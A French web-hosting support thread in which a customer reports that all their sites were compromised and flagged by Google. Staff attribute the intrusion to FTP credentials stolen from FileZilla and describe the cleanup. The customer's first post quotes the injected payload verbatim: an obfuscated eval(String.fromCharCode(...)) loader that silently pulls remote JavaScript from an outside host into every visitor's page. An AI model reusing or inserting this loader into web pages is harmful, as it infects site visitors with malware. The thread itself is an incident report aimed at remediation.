Problème Sécurité

[eBiz]

Bonjour,

Sur l'ensemble de mes sites, un code a été rajouté j'ignore comment entrainant un blocage par les navigateurs et Google.

Le site Web à l'adresse g h o l a m i b o i s. com contient des éléments provenant du site besloqawe.com, lequel semble héberger des logiciels malveillants qui peuvent nuire à votre ordinateur ou agir à votre insu. Votre ordinateur peut être infecté simplement lors de la visite d'un site contenant des logiciels malveillants.

Sur le code de la page, j'ai identifié le script suivant:

<kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,108,107,102,106,102,117,105,115,100,104,46,99,111,109,58,51,49,50,57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,115,101,116,84,105,109,101,111,117,116,40,34,108,106,115,40,41,34,44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>

S'agit il d'une intrusion ?

Peut on restaurer un backup d'il y a quelques jours/semaines pour corriger la situation ?

Merci

[eBiz]

Staff,

Je vous prie de bien vouloir jeter un coup d'oeil au problème ci-dessus.

Merci

[staff]

Avez vous recu le message technique vous expliquant l'intrusion et vous informant du nettoyage de vos pages index.html par notre technicien?

Il a du vous transmettre son compte rendu de l'investigation en vous donnat les instructions a suivre comme changer vos passwords FTP et effacer vos codes d'acces depuis Filezila suite a cette injection du script malicieux dans vos pages.

Qu'en est il de la situation?

[eBiz]

Bonjour,

Je n'ai pas reçu de mail, pourriez vous le reenvoyer please ?

Merci

[staff]

Voici une copie du message:

Un script malicieux a ete injecté dans toutes vos pages index.html. Nous sommes entrain de faire un nettoyage de toutes ces pages pour vous. Vous pouvez voir un exemple dans votre dossier public_html, la page qui s'appelle: index.html--old

Nous l'avons laissé comme démonstration pour que vous puissiez voir ce qui a ete injecte.

D'après notre expérience, cette attaque vient parceque vous utilisez filezila et que vous avez votre accès ftp enregistré dessus. Filezila ne crypte pas ces codes d'accès et il ya aujourd'hui des virus windows qui volent ces acces dans le but d'injecter des virus et se les redistribuer encore.

Votre système a ete nettoyé par contre veuillez effacer vos codes d'accès depuis filezila et changer vos mots de passe ftp.

[eBiz]

Merci de votre réponse.

Je me rends compte que presque tous les sites de mon compte ont été affectés et bloqués par Google.  Je viens de vérifier mais je ne retrouve pas les pages que vous avez mentioné: index.html--old

Ne serait il pas possible de restaurer un backup récent si vous en disposez ?

Merci de votre support !

[eBiz]

Tous mes sites et toutes les pages (non pas seulement index.html) ont été impactées. Please help !

[eBiz]

J'ai du netoyé tous les sites manuellement, j'ai aussi changes les codes FTP bien que je ne les auvegarde pas sur FileZilla.

Cordialement,